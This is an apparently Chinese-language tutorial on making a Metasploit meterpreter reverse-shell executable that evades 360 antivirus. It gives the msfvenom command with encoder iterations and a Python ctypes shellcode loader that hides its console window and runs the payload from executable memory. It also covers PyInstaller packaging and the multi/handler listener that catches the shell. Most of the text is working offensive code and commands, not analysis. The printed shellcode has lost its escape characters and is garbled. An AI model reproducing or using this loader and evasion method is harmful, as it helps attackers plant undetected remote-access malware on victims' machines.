Metasploit+python生成免杀exe过360杀毒

Metasploit+python生成免杀exe过360杀毒

1在kali下生成一个反弹的msf的python脚本,命令如下：

msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102  -e x86/shikata_ga_nai -i 11 -f py -o  /opt/bk.py

2.拷贝出bk.py到window32系统进行修改，修改如下（这里的红色标注是修改增加的代码，其他不变）

from ctypes import *

import ctypes

buf =  ""

buf += "xbbx7ax62x0ax22xdbxc9xd9x74x24xf4x58x29"

buf += "xc9xb1x97x31x58x15x03x58x15x83xe8xfcxe2"

buf += "x8fxdcx50xbcx22x5dxbfx0cx65xe9x1bx79xcd"

buf += "x39xadx30x7cx0cx5dx21xfdx87x61x46x2bxc8"

buf += "x35xc0x38x81xbfxd5xb9xd7x14x0cxcbx00x79"

buf += "x12x5dxd0xb1xeexfex06x1dx51x8ax92x29xd2"

buf += "xa4x4cxd0x08x22xdcx4fx24xb2x2bx2bxdax00"

buf += "x5fxa3x1dx01xfexe9xf2x62xebxa7x46x63xce"

buf += "xacx45xe4x8bxa1xa3x85x14xe1x1ex06xa7x6e"

buf += "x7ax03xe7x05xd2x41x32x24x3cx48x72xf2x57"

buf += "x0fx58x58x5cxf6xd5x0fx5bx6bxcax34xddx5d"

buf += "xe0x62x5axc2xdex3dxdcxb3xf0x3ex78x31x90"

buf += "x6cx5fx58xeex84xb0x30x87x60xecx58x25xad"

buf += "x4ax6bxc6xb7xd8x70xb8x2fxc8xd9xcfxecx10"

buf += "xcbx67x90xf2xdfxf2x4axf3x23xf6xd1x12xa5"

buf += "xfbx10xa9x56x4exd0xdcx10x21x1dxb5x58x17"

buf += "xe1x6dx69x74xc7xacx58x1axc9xf7x00xf8x54"

buf += "x76x05x6dxd4x9ex9cx22xdbx0fxa9xfaxe3x8b"

buf += "x8ex1ax1fx60xdbxbexefx2fx73xa5x42x02x93"

buf += "x89x0fx42xfaxaexb9x9bxecxe2x53x56x38x51"

buf += "x45x6fxb8xd2xffx3ax73x44xe4x38x38xf2x28"

buf += "x76xf0xcax34x80x35x55x83xadx29x23x8axca"

buf += "x07xcfx88x30x15x2exc0x99x1exddxb6xbbx49"

buf += "x92x1ex9axddxcfx58xe9x84x66x3dx38xfcx28"

buf += "x99xa4x19x09xe6x1cxf5xadx4fxa1x81xbfx51"

buf += "x3dx0bx9ex27x60x20x7dx59x6ex82x7cx25x5c"

buf += "x4ex34x25xedxc3xb1x45x02x92x75xf5x11xa5"

buf += "x54xdcx1bx6fx9bx56xd2xb5x80x66xcfxe1x61"

buf += "xd1x01xe4x31x52xd9x5bx01x37x29xa8xefxc8"

buf += "x53x9bx1cx47x30x9exe4x6axdaxb3xd5xfdxf5"

buf += "xb8x13xbcx92xbbxb4x82x70x02xadxefx3bx70"

buf += "xf4x98x84x31x52x97x60x2bx2ex84x9bx7fxb7"

buf += "x30x85x58xefx8cx95xa0x56x2fxefx20x61x0d"

buf += "x94x66xbfxa7xd0x71x56x52x82xb1xa0x19xe4"

buf += "x7exd9x90x96x2bx16xeax4cxdexcdx05x23x6e"

buf += "xc2x4bxc0x68x1bxbaxc1x1dxcax26x74xd1x92"

buf += "x4exd3x70x8ax43x41xbex59xf1x20x33x89xb9"

buf += "x2bxdbx9ax0fxadx8dx80x4cx78x52xe7x0axf7"

buf += "x47xd8x5cx0cx3cxd4x0dx3dxe7xbdx2dx22xb1"

buf += "x37x0axd9x5exf2xd5xd2x56xe0x56x1cx42xc3"

buf += "x75x92x55x7cx86x6axb4xcdx3axcex4dxeax4f"

buf += "xa4x31xc6xe0x16x27xa5xf4x9dx79x5exfcx60"

buf += "xebxefx35x33x6ex5bx6dxecx8fx9bx1exb1xf6"

buf += "x35xebx1fx3bxabx99x9ax34x2axf8x25x38xba"

buf += "x40xe9xb0x51xbcxdfx60x16x62xc3x63x64xbd"

buf += "xb5x28xf6x4cx71xd2x01x74x11xf0xd7xcdx4f"

buf += "x34xadxc2x65x4cxebx78xc1xbfxbax80x6cx46"

buf += "x6ax15x15x03x5ex8dx65x8ex69x89x29x7fx67"

buf += "xeaxc1x6bx62xb0xd4"

 

#libc = CDLL('libc.so.6')

PROT_READ = 1

PROT_WRITE = 2

PROT_EXEC = 4

def executable_code(buffer):

    buf = c_char_p(buffer)

    size = len(buffer)

    addr = libc.valloc(size)

    addr = c_void_p(addr)

    if 0 == addr: 

        raise Exception("Failed to allocate memory")

    memmove(addr, buf, size)

    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):

        raise Exception("Failed to set protection on buffer")

    return addr

VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc

VirtualProtect = ctypes.windll.kernel32.VirtualProtect

shellcode = bytearray(buf)

whnd = ctypes.windll.kernel32.GetConsoleWindow()   

if whnd != 0:

       if 666==666:

              ctypes.windll.user32.ShowWindow(whnd, 0)   

              ctypes.windll.kernel32.CloseHandle(whnd)

print ".................................."*666

memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),

                                          ctypes.c_int(len(shellcode)),

                                          ctypes.c_int(0x3000),

                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

old = ctypes.c_long(1)

VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),

                                     buf,

                                     ctypes.c_int(len(shellcode)))

shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

print "Code By Luan"

shell()

3.在windowsx86上安装支持python的环境，下载pywin32 解压运行，一直点下一步就可以了

4.然后下载支持将python生成exe的软件pyinstall ，解压然后执行以下命令:

D:mianshapyinstaller-2.0>python PyInstaller.py --console --onefile  bk.py

注意这里不要有中文路径，否则会出错

5.执行命令后会在d:pyinstaller-2.0kdist目录生成bk.exe

 

6.这里我将在windowsx86上安装最新的360杀毒软件，进行查杀测试

 

7.然后在kali下启动msf，然后执行以下命令：

use exploit/multi/handler

set lhost 192.168.1.102

set lport 443

set PAYLOAD windows/meterpreter/reverse_tcp

exploit

8.然后在windowsx86系统上执行bk.exe,最终在msf反弹出meterprer 出来：